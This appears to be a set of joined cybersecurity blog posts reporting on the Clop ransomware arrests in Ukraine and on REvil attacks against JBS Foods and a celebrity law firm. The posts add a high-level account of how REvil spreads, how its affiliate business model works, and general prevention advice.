Clop Ransomware Gang Got Arrested By Ukraine Police

Ukrainian law enforcement officials have arrested Clop ransomware gang. Officials informed that they have been disrupting the infrastructure used in attacks targeting victims around the world since 2019.

Ukrainian National Police, authorities from South Korean and U.S. authorities ran a joint operation and arrested six offenders who are accused of running a double extortion scheme. Wherein if victims refusing to pay a ransom then these hackers threatened them with sensitive monetary leak and personal data.

“Together, law enforcement has managed to shut down the infrastructure from where the virus spreads and block channels for legalizing criminally acquired cryptocurrencies," the National Police said.

Law enforcement officers seized computer equipment, cars and $ 184,679 (5 million hryvnia} in 21 searches in the Kiev region. This seizure includes the defendant’s car and house.

Clop ransomware defendants will face up to 8 years imprisonment for unauthorized intrusion/snooping in the home or work computers, AI systems, Computer and telecommunication networks. It is still not disclosed whether these defendants are just affiliate or core developer of ransomware operations.

Clop Ransomware Previous Attacks :

Clop threat actors have been associated with number of high-profile attacks, including Accellion, Qualys, Software AG IT, ExecuPharm, Indiabulls since 2019. Many universities such as Maastricht University, Stanford University Medical School, University of Maryland, and University of California.

Another ransomware group named Avaddon cover up operations and passed 2,934 victims’ decryption key with Bleeping Computer Last week.

You can read below articles about to know more about Ransomware attacks.

Execution and Business Model of REvil Ransomware

REvil Ransomware Attack - JBS Foods Shutdowns Temporarily 

REvil Ransomware Attack - JBS Foods Shutdowns Temporarily

The largest meat distributor JBS Foods faced a REvil ransomeware attack over the weekend and it disrupted several servers supporting IT systems and affected the supply chain as well.

Global meat distributor JBS SA had to shut down operations in the United States, Canada and Australia after a Ransomware attack on its IT systems. “Attackers targeted several servers supporting North American and Australian IT systems of JBS Foods on Sunday”, according to a statement by JBS USA. JBS employees were greeted with a ransom note over the weekend the same had been used in previous REvil attacks as well.

“the company took immediate action, suspending all affected systems, notifying authorities and activating the company’s global network of IT professionals and third-party experts to resolve the situation,” as per company statement after ransomware attack.

Production has begun to resume at most of the JBS beef plants in the United States on Wednesday. Canada beef plant partially operational on Tuesday. Most of the workers at JBS plants in Australia, Canada and the United States were unable to start their work on Monday and Tuesday.

JBS didn’t confirm whether it had paid the ransom or not to the attackers.

Who is JBS Foods

Brazil-based JBS Foods is the largest meat distributor includes beef, chicken and pork. Total 245,000 employees work for JBS in many countries and has 9 plants in US. Their major clients are Country Pride, Swift, Certified Angus Beef, Clear River Farms and Pilgrim’s.

Who is Attacker -

The FBI confirmed that Russia-based cybercriminal group known for its attacks on leading U.S. companies and they are the major suspect. This group is known as REvil and it has already targeted around 237 organizations since 2020, according to Recorded Future, a cybersecurity company. The number of victims of ransomware attack could be much higher because most of the organization quietly pay their ransom to maintain their reputation and avoid the loss of data.

What is REvil Ransomware -

REvil group runs its organization like "ransomware as a service" and rents their script and help to individual or group to target the attack. This is known as Sodinokibi, Bluebackground, or Sodin aslo. If you remember Darkside who was responsible Colonial Pipeline ransomware attack, is one of the subscriber of REvil group. Reports suggest that now DarkSide has choose a separate path. If you want to know about Execution and Business Model of REvil then you should read this post.

You can find Prevention method also in above post.

REvil Ransomware Attack | Hackers Threaten to Post Trump "Dirty Laundry" And Celebs Secret

A New York-based firm, Grubman Shire Meiselas & Sacks that offers legal services to the entertainment and media industries including Lady Gaga, Madonna, Elton John, Barbara Streisand, Bruce Springsteen, Mariah Carey and Mary J. Blige and Priyanka Chopra, has been hit by a ransomware attack.

Cybercriminals attack law firm using the REvil ransomware (also known as Sodinokibi). Hackers are now threatening to release the 756 gigabytes of data allegedly stolen - including Telephone numbers, Email addresses, non-disclosure agreements, client contracts and personal correspondence. However, celebrity law firm is declining to settle up and now attackers have multiplied the ransom request to $42 million and threatened to publish the information they have claimed to have "a ton of dirty laundry" about President Trump.

Since this information is in public domain, you can get further update from any NEWS channel or websites. Here I'm going to share complete details of REvil ransomware.

 

REvil ransomware -

REvil, also known as Sodinokibi, Bluebackground, or Sodin, is a ransomware that is backed by an underground affiliate program,  uses wide range of tactics to distribute the ransomware and earn 30% to 40% commission. It appeared in the first half of 2019. It exploited vulnerabilities in remote services such as Oracle WebLogic platform (CVE-2019-2725) and carried out attacks on MSP providers. Oracle vulnerability was easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack.

Execution Method –

Hackers utilized the CVE-2019-2725 vulnerability to execute a PowerShell command on Oracle WebLogic server. Doing so allowed them to upload a dropper to the server, which then installed the payload — the Sodin ransomware. Patches for the bug were released in April, however, a similar vulnerability was discovered — CVE-2019-2729 later.

REvil gets onto users’ machines in different ways using MSPs.  In few examples, the attackers used the Webroot and Kaseya remote access consoles to implant the Trojan. In other cases, hackers penetrated MSP infrastructure using an RDP connection, gained privileges, deactivated security solutions and backups, and then downloaded ransomware to client computers.

Sodinokibi or REvil ransomeware collects some basic system information and saves it to the registry with the generated encryption parameters. If the dbg option is not in the config, the UI language and keyboard layout values are checked, and the malware will simply exit on systems.

Business Model –

Sodinokibi or REvil ransomeware works on Ransomware-as-a-Service (RaaS) model. Sodinokibi has 41 active affiliates program. Each affiliate's version of Sodinokibi gets customized with a unique ID so that they can receive payments. Sodinokibi affiliates keep 60 to 70 percent of every ransom payment.

 In July 2019, Sodinokibi advertisers posted a recruitment announcement on a popular hacking forum UNKN.  They mentioned in advertisement that they were looking for experienced individuals to expand their activity and it was a private operation with "limited number of seats" available.

The forum post stressed that it’s forbidden to do business in the Commonwealth of Independent States (CIS) region, including Ukraine, Russia, Belarus, and Moldova.

You can see below some of their attacks post their hiring process. 

§  August 2019, Sodin attack 22 local administrations in Texas and demanded a collective ransom of $2.5 million. 

§  August 2019 : Hacker attack a remote data backup service and encrypted files from dental practices in the U.S. 

§  December 2019 : Hacker  hit another IT vendor serving hundreds of dentistry practices, infecting clients’ computers by exploiting a vulnerable remote access tool. 

§  December  2019 : They claim that they attack against the CyrusOne data center. As per UNKN claim,  they have stolen files from the company before encrypting their network.

§  December  2019 : Developers changed their ransom note over the holidays to include a new message wishing the victims a "Merry Christmas and Happy Holidays".

§  December  2019, they attack Travelex and  the company has to take offline all its computer systems. 

§  January 2020 : Sodinokibi threatened to publish data stolen from GEDIA Automotive Group, a German automotive supplier. They published a MS Excel spreadsheet containing an AdRecon report with information on an Active Directory environment. 

§  February 2020 : the operators of the Sodinokibi Ransomware (REvil)  started urging affiliates to copy their victim's data before encrypting computers . 

§  February 2020 : the operators of  Sodinokibi Ransomware published download links to files containing what they claim is financial and work documents  and customers' personal data stolen from U.S. fashion house Kenneth Cole Productions.

 

Prevention –  

We recommend the following actions to prevent these kind of ransomware attack. 

Ø  A little bit of extra vigilance and don’t open dubious-looking emails. 

Ø  Maintain up-to-date backups of the most important files. 

Ø  Take seriously the storing of passwords for remote access. 

Ø  Use two-factor authentication. 

Ø  Log and centrally collect web, application, and operating systems events. 

Ø  Restrict the account access used to run the WebLogic process. 

Ø  Monitor for Egress network communications from data center systems. 

Ø  Unexpected activity of service or system accounts (WebLogic user). 

Ø  Scan and mitigate your vulnerability posture. 

Ø  Restrict outbound Data Center communications.  

Ø  Always ready for Disaster Recovery, including maintaining and testing data backups and recovery.

 

Conclusion -

Sodinokibi, REvil, Sodin  – regardless of what you call it, it's the dangerous  ransomware on the cyberthreat map now. The REvil attackers use zero-day exploit to distribute ransomware and zero-day exploitation technique could work on otherwise fully-patched systems. Its developers seem to always have new unpredicted tricks up their sleeve, and perfect crypto implementation means that victims must pay up otherwise they will lose all their data.